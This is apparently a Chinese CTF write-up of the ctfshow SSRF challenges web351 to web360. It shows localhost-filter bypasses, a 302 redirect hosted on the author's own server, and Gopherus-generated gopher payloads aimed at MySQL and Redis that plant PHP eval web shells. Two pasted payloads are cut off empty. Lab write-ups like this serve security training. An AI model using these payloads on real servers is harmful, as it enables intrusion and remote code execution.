# web351:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
| <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
|
扫后台扫到了 flag.php,由此,访问之后发现非本地无法访问,所以直接 ssrf 读文件:
1
| url=http://127.0.0.1/flag.php
|
# web352:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|127.0.0/')){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
1
| mixed parse_url ( string $url [, int $component = -1 ] )
|
本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。
这道题过滤了 localhost 和 127.0.0,绕过方式挺多的:
1 2 3 4 5
| url=http://0x7F.0.0.1/flag.php 16进制 url=http://0177.0.0.1/flag.php 8进制 url=http://0.0.0.0/flag.php url=http://0/flag.php url=http://127.127.127.127/flag.php
|
# web353:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|127\.0\.|\。/i', $url)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
过滤了 127.0. 和句号,那么,绕过有下面的:IP 地址进制转换网站
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| 十六进制 url=http://0x7F.0.0.1/flag.php 八进制 url=http://0177.0.0.1/flag.php 10 进制整数格式 url=http://2130706433/flag.php 16 进制整数格式,还是上面那个网站转换记得前缀0x url=http://0x7F000001/flag.php 还有一种特殊的省略模式 127.0.0.1写成127.1 用CIDR绕过localhost url=http://127.127.127.127/flag.php url=http://0/flag.php url=http://0.0.0.0/flag.php
|
# web354:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|1|0|。/i', $url)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
过滤了 1 和 0,之类可以利用解析到 127.0.0.1 的域名作为绕过或者 302,前者:SSRF 域名解析到 127.0.0.1,
这里的 payload :http://safe.taobao.com/flag.php。
# web355:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=$x['host']; if((strlen($host)<=5)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
这里要求长度小于五,直接用 http://0/flag.php 去绕过。
# web356:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=$x['host']; if((strlen($host)<=3)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?>
|
长度小于 3,还是上一题那个 payload 一把梭。
# web357:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $ip = gethostbyname($x['host']); echo '</br>'.$ip.'</br>'; if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) { die('ip!'); }
echo file_get_contents($_POST['url']); } else{ die('scheme'); } ?>
|
ai 的解释如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
| <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){ $ip = gethostbyname($x['host']); echo '</br>'.$ip.'</br>'; if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) { die('ip!'); } echo file_get_contents($_POST['url']); } else{ die('scheme'); } ?>
|
这里打 302 跳转,在公网服务器上写入如下代码:
1 2 3
| <?php header("Location: http://127.0.0.1:80/flag.php",TRUE,302); ?>
|
之后使用如下命令临时运行:
php -S 0.0.0.0:2333
传入 url 参数为:
url=http://<vps_ip>: 端口
# web358:
1 2 3 4 5 6 7 8
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){ echo file_get_contents($url); }
|
这里使用正则表达式检查 $url 是否以 "http://ctf.“开头,并且以”.show" 结尾(不区分大小写), 前面呢就利用 @符号就可以绕过,后面利用 get 传参方式绕过:
http://ctf.@127.0.0.1/flag.php?show
# web359:
随便输入了一个账号密码后,跳转到 check.php 文件,抓包后 post 出现了一个 returl,由此,利用 gopher 协议构造攻击,利用 gopherus 生成 gopher 语句攻击。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| ┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus] └─# python2 gopherus.py --exploit mysql
________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: root Give query to execute: select "<?php @eval($_POST["cmd"]);?>" into outfile '/var/www/html/2.php';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%22%63%6d%64%22%5d%29%3b%3f%e3%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%27%3b%01%00%00%00%01
-----------Made-by-SpyD3r-----------
|
生成的 gopher 协议不能直接用,需要经过 url 编码之后才能用:
1
| gopher://127.0.0.1:3306/_
|
不知道为啥,我自己的 payload 用不了,贴一个别人的吧:
1
| gopher://127.0.0.1:3306/_
|
之后访问 1.php 用 post 传一个 1=system (“cat+/flag.txt”); 即可。
# web360:
1 2 3 4 5 6 7 8 9 10 11
| <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?>
|
这么用:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| ┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus] └─# python2 gopherus.py --exploit redis
________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/
author: $_SpyD3r_$
Ready To get SHELL
What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html): Give PHP Payload (We have default PHP Shell): <?php eval($_post[1]);?>
Your gopher link is Ready to get PHP Shell:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_post%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
-----------Made-by-SpyD3r-----------
|
不知为啥,我的还是用不了,不过,照理来说,发送了之后访问 shell.php 就能 rce 了。